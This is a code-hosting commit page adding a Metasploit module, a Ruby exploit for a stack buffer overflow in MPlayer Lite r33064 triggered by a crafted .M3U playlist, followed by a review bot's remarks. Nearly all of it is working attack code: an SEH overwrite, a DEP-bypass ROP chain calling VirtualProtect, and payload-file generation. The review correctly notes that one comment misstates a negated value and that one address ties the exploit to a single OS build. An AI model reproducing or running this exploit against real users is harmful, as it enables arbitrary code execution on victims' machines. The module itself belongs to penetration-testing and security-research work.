Land #2910 - MPlayer Lite M3U Buffer Overflow
Showing
1 changed file
with
118 additions
and
0 deletions.
@@ -0,0 +1,118 @@ | ||
## | ||
# This module requires Metasploit: http//metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = AverageRanking | ||
|
||
include Msf::Exploit::FILEFORMAT | ||
include Msf::Exploit::Seh | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'MPlayer Lite M3U Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a stack-based buffer overflow vulnerability in | ||
MPlayer Lite r33064, caused by improper bounds checking of an URL entry. | ||
By persuading the victim to open a specially-crafted .M3U file, specifically by | ||
drag-and-dropping it to the player, a remote attacker could execute arbitrary | ||
code on the system or cause the application to crash. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit | ||
'Gabor Seljan', # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
[ 'BID', '46926' ], | ||
[ 'EDB', '17013' ], | ||
[ 'URL', 'http://www.mplayer-ww.com/eng/' ] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
'ExitFunction' => 'process' | ||
}, | ||
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00\x20\x0d\x0a\x1a\x2c\x2e\x26\x2f\x3a\x3e\x3f\x5c", | ||
'Space' => 5040 | ||
}, | ||
'Targets' => | ||
[ | ||
[ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064', | ||
{ | ||
'Offset' => 21, | ||
'Ret' => 0x649a7bbe # ADD ESP,64C # PPPR [avformat-52.dll] | ||
} | ||
], | ||
], | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Mar 19 2011', | ||
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) | ||
], | ||
self.class) | ||
|
||
end | ||
|
||
def junk | ||
return rand_text_alpha(4).unpack("V").first | ||
end | ||
|
||
def nops | ||
return make_nops(4).unpack("V").first | ||
end | ||
|
||
def exploit | ||
|
||
# ROP chain generated by mona.py - See corelan.be | ||
rop_gadgets = | ||
[ | ||
0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll] | ||
0x10018fc3, # &CALL ESP [unrar.dll] | ||
0x64984a70, # POP EAX # RETN [avformat-52.dll] | ||
0xffffec4f, # Value to negate, will become 0x00005040 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll] | ||
junk, | ||
junk, | ||
0x1001d154, # POP EAX # RETN [unrar.dll] | ||
0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll] | ||
0x64987f7f, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll] | ||
0x6afcdc68, # XCHG EAX,ESI # RETN [avcodec-52.dll] | ||
0x6b02836d, # POP EAX # RETN [avcodec-52.dll] | ||
0xffffffc0, # Value to negate, will become 0x00000040 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6af79d80, # XCHG EAX,EDX # RETN [avcodec-52.dll] | ||
0x1001bad6, # POP ECX # RETN [unrar.dll] | ||
0x649eab48, # &Writable location [avformat-52.dll] | ||
0x6d7c0bb7, # POP EDI # RETN [swscale-0.dll] | ||
0x6b03d722, # RETN (ROP NOP) [avcodec-52.dll] | ||
0x64984a70, # POP EAX # RETN [avformat-52.dll] | ||
nops, | ||
0x6d7c57d1 # PUSHAD # RETN [swscale-0.dll] | ||
].flatten.pack('V*') | ||
|
||
sploit = rand_text_alpha_upper(target['Offset']) | ||
sploit << rop_gadgets | ||
sploit << payload.encoded | ||
sploit << generate_seh_record(target.ret) | ||
sploit << rand_text_alpha_upper(1000) # Generate exception | ||
|
||
# Create the file | ||
print_status("Creating '#{datastore['FILENAME']}' file ...") | ||
file_create("http://" + sploit) | ||
|
||
end | ||
end | ||
|
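Review bot: The ROP chain hard-codes `0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll]` while every other gadget is taken from DLLs shipped with the player (avcodec-52, avformat-52, unrar, swscale-0); RPCRT4.dll is an OS library, so that single pointer presumably ties the target to one particular XP SP3 build and locale rather than to MPlayer r33064 alone, which the target name `'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064'` does not convey. I would state the assumption on the gadget line, e.g. `0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll] - OS DLL, assumes XP SP3 base 0x77e70000; not an MPlayer module`, or, if one of the bundled DLLs imports VirtualProtect, take the IAT entry from there so the chain survives OS patch-level differences. Separately, the comment on `0xffffec4f` says it `will become 0x00005040`, but negating that value gives 0x000013b1 (5041 decimal), i.e. the 5040-byte payload Space plus one; the comment should read `# Value to negate, will become 0x000013b1 (5041)` so a reader does not look for a 0x5040-byte region. Whether the one-byte excess over Space is deliberate cannot be told from the hunk, though VirtualProtect's page granularity makes it harmless in practice.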